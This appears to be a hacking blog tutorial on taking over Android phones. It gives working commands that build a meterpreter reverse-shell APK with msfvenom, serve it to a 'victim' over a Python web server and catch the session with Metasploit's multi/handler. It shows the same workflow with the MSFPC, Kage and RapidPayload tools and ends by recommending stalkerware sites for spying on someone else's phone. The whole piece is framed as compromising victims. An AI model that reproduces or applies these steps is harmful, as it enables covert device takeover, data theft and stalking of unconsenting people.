Multiple Methods to Exploit Android Phones

Hey Folks, as we know that there are already many tutorials has in this subject, but today we will squeeze out everything and present to you the best tools that will always help you to exploit or h@ck android smartphones. Nor are there only CLI tools in this tutorial, but we have also added some websites where you can spy on any android smartphone for free.

Lets take a look 🙂 !!

Msfvenom

MSFvenom comes pre installed in kali linux operating system and used to make a payload to penetrate the android emulator, linux os, windows etc. But if you are using an other operating system or application then you can download from it here. Anyone can easily create malicious payloads for any platform, but the things that are important during payload creation are to understand!

Usage 🙂 msfvenom -p < payload name > lhost=< your localhost addr > lport=< choose any port > RAW Format Payload > Payload Name

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 R > secnhack.apk

The payload has been created ! But the thing is how to share payload to the victim ? There are many ways from which you can choose according to yourself such : python share, apache, ngrok, online file share service etc. but in our case we will choose python share service for localhost.

apt install python
python -m SimpleHTTPServer

When the victim opens your URL in their favorite browser, the interface will look like the one below.

Do you know about the Metasploit Framework ? Metasploit Framework is a computer security project that is designed to penetration teating purposes and now we will use this framework to maintain the meterpreter session. But first we have to execute the following command.

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10
set lport 4444
run

H@cked ! Victim smartphone successfully accessed by attacker and you have to read the article from here to get sensitive information from the victim smartphone. Let’s go to the next method.

MSFPC

MSFvenom Payload Creator (MSFPC) is a automatic tool that generates multiple types of payloads, based on user-selected options. The idea is to be as simple as possible (using as few as one option) to produce a payload. Its also comes pre-installed in kali linux so we can start this tool just type “MSFPC” in terminal.

The payload creation process is much simpler than other tools and we can create the payload by executing the below command.

msfpc APK 4443

Great 🙂 After the payload creation process is complete it gives us a direct command as you can see on the above image from which we can share our payload and start a multi-handler. But as soon as the victim downloads and installs our payload then you can see that we get the meterpreter session.

Kage Metasploit ( GUI )

Kage is specifically designed to create payloads for different platforms and interact with the meterpreter session via the (GUI) interface. In this article we will not show you the complete installation of this tool hence you have to check the complete article here. Let us configure this tool and first we will download it from here and then execute the following commands.

sudo chmod +x Kage.0.1.1-beta_linux.AppImage
sudo ./Kage.0.1.1-beta_linux.AppImage

You can complete further installation of this tool by visiting the given link. First you have to create the payload.

Now we will set the multi-handler to maintain the payload by clicking on the create button.

Good Job 🙂 !! Now here we can control the victim smartphone remotely by interact with meterpreter session.

Rapid Payload

It is another automated tool designed to create a metasploit payload and interact with a meterpreter session. Lets download it first and configure in terminal by using the following command.

git clone https://github.com/AngelSecurityTeam/RapidPayload
cd RapidPayload
bash install.sh

It will take some time which depends on your computer configuration and once the installation is done we can use this tool by executing the following command.

python3 RapidPayload.py

Now below you can see that we select option “3” to create android payload and add further details as per need or configuration.

Here we need to enter any password for the keystore and after that we can add the details according to us.

Generated 🙂 !! The payload will save in the directory of this tool from where we can share it directly with python tool.

Done 🙂 !! Now we come back to this tool and start the multi-handler by selecting the “10” option. As you can see we have received the meterpreter session after the victim has clicked on the payload.

Celltracker – Free

CellTracker is a free, undetectable, and advanced mobile tracking application exclusively designed for Android Phones. The main thing is that the website is completely free and you can spy on any Android smartphone throughout your life.

You will also get to know about the features of this website from the given screenshot.

If you do not have money and want to spy on someone else’s android phone then we would recommend you to use this website.

Hoverwatch – Paid

Its is another android spying web application but it give us paid service and we would be highly recommend you if you looking a quality android spying application.